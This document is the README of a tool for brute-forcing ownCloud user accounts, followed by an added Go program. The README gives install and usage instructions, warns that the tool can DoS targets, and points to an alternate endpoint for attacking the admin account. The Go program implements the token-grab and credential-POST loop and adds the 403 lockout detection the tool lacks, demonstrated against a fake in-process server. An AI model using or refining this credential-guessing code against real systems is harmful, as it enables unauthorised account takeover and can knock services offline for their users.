Simple tool to bruteforce owncloud instance

owncloud_bruteforcer

A simple tool to brute-force ownCloud user accounts.

A word of caution: with the default settings this tool can DoS the target ownCloud instance.

Description

The tool:

  • makes a GET request to the login page to acquire the CSRF token and session cookies
  • makes POST requests to the login page with the given username (or username wordlist) and each password from the password wordlist.

Installation

go install git.sual.in/casual/owncloud_bruteforcer@latest

Example

owncloud_bruteforcer -u "https://target.com/login" -P ./rockyou.txt

Help

Owncloud_bruteforcer - tool to bruteforce user

Usage:
  owncloud_bruteforcer [flags]

Flags:
INPUT:
   -url, -u string                target's url to login page. Example "https://example.com/index.php/login, http://example.com/login "
   -login, -l string              username to bruteforce (default "admin")
   -login-wordlist, -L string     username wordlist
   -password-wordlist, -P string  password wordlist
   -proxy, -x string              HTTP proxy for traffic inspection (Burp/Caido/ZAP), for example http://127.0.0.1:8080. Be aware that if you intercept requests in the proxy, the added delays will make the attack fail
   -threads, -t int               threads to bruteforce (default 10)

Notes (TODO)

  • Expect the tool to DoS the service (100% CPU), even if brute-force protection is enabled. If you prefer not to, set -t 5 or lower (this slows the attack down).
  • A successful login is detected from the Location header of the redirect that follows the POST. If the user has 2FA enabled, the redirect differs and the tool will not report the found login:password pair.
  • Brute-force protection is not detected: once the limit is hit, the POST is answered with 403 instead of 303, which the tool does not currently recognise.
  • If the connection drops, or a WAF/rate limit blocks you, you may receive can't create (POST) request: Post "https://target.com/login": context deadline exceeded (Client.Timeout exceeded while awaiting headers), and the attack stops with no way to resume.
  • The administrator account can also be attacked through a different endpoint; this could allow brute-forcing the admin account in parallel without slowing down the current version of the tool.
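The following Go program is an added example, not the project's own code. It performs the two-step exchange described under Description (GET for the CSRF token and cookies, then the POST) and classifies the POST response the way the Notes describe: a 303 whose Location leads back to a login page is a failed attempt, a 303 elsewhere is a success, a 403 is the lockout the tool currently misses, and a client timeout is how a WAF or rate limit shows up. It runs offline against a constructed in-process fake of the login endpoint, so nothing here is ownCloud's code. The form field names user, password and requesttoken, the data-requesttoken attribute, and the rule that a redirect containing "login" means rejection are assumptions about the real login page; the fake server's token, cookie and credentials are made up for the demo.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/http/cookiejar"
	"net/http/httptest"
	"net/url"
	"regexp"
	"strings"
	"sync/atomic"
	"time"
)

// Result classifies one login attempt from the POST response.
type Result int
const (
	Failed  Result = iota // redirected back to the login page
	Success               // redirected elsewhere (e.g. the files app)
	Locked                // 403: brute-force protection has kicked in
	Unknown               // anything else (WAF block page, 5xx, ...)
)
// Assumption: the login page carries the CSRF token as data-requesttoken="...".
var tokenRe = regexp.MustCompile(`data-requesttoken="([^"]+)"`)

// Classify maps POST status + Location to a Result. Assumption: a redirect
// whose target contains "login" means the credentials were rejected.
func Classify(status int, location string) Result {
	switch status {
	case http.StatusForbidden:
		return Locked
	case http.StatusSeeOther, http.StatusFound:
		if strings.Contains(location, "login") {
			return Failed
		}
		return Success
	}
	return Unknown
}

// NewClient: cookie jar, hard timeout (a stalled WAF/rate limit becomes an error, not a hang), no redirect following so the 303 Location stays visible.
func NewClient(timeout time.Duration) *http.Client {
	jar, _ := cookiejar.New(nil)
	return &http.Client{Jar: jar, Timeout: timeout,
		CheckRedirect: func(*http.Request, []*http.Request) error { return http.ErrUseLastResponse }}
}

// TryLogin does the two-step exchange: GET for token + cookies, then POST. Field names user/password/requesttoken are assumptions.
func TryLogin(c *http.Client, loginURL, user, pass string) (Result, error) {
	resp, err := c.Get(loginURL)
	if err != nil {
		return Unknown, fmt.Errorf("GET: %w", err)
	}
	page, _ := io.ReadAll(resp.Body)
	resp.Body.Close()
	m := tokenRe.FindStringSubmatch(string(page))
	if m == nil {
		return Unknown, fmt.Errorf("no requesttoken in login page")
	}
	form := url.Values{"user": {user}, "password": {pass}, "requesttoken": {m[1]}}
	if resp, err = c.PostForm(loginURL, form); err != nil {
		return Unknown, fmt.Errorf("POST: %w", err)
	}
	resp.Body.Close()
	return Classify(resp.StatusCode, resp.Header.Get("Location")), nil
}

// NewFakeOwnCloud is a constructed test double, not ownCloud code: it binds a token to a session
// cookie, accepts admin:correct-horse, and answers 403 (even to the right password) after limit failures.
func NewFakeOwnCloud(limit int32) *httptest.Server {
	var failures int32
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Method == http.MethodGet {
			http.SetCookie(w, &http.Cookie{Name: "ocsession", Value: "s1"})
			fmt.Fprint(w, `<html><head data-requesttoken="tok123"></head></html>`)
			return
		}
		if ck, err := r.Cookie("ocsession"); err != nil || ck.Value != "s1" || r.FormValue("requesttoken") != "tok123" {
			w.WriteHeader(http.StatusPreconditionFailed) // CSRF check failed: no GET first
			return
		}
		switch {
		case atomic.LoadInt32(&failures) >= limit:
			w.WriteHeader(http.StatusForbidden)
		case r.FormValue("user") == "admin" && r.FormValue("password") == "correct-horse":
			http.Redirect(w, r, "/apps/files/", http.StatusSeeOther)
		default:
			atomic.AddInt32(&failures, 1)
			http.Redirect(w, r, "/login?user=admin", http.StatusSeeOther)
		}
	}))
}

func main() {
	srv := NewFakeOwnCloud(3)
	defer srv.Close()
	res, err := TryLogin(NewClient(10*time.Second), srv.URL+"/login", "admin", "correct-horse")
	fmt.Println("result:", res, "err:", err)
}
```

Because the client never follows redirects, Classify sees the raw 303 and its Location; a tool that lets the client follow the redirect would instead land on a 200 login page or files page and have to scrape HTML to tell them apart. Treating 403 as Locked, rather than as just another failure, is the check the Notes say the tool currently lacks.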

License

This project is licensed under the MIT License - see the LICENSE file for details. I am not responsible for any actions or damage.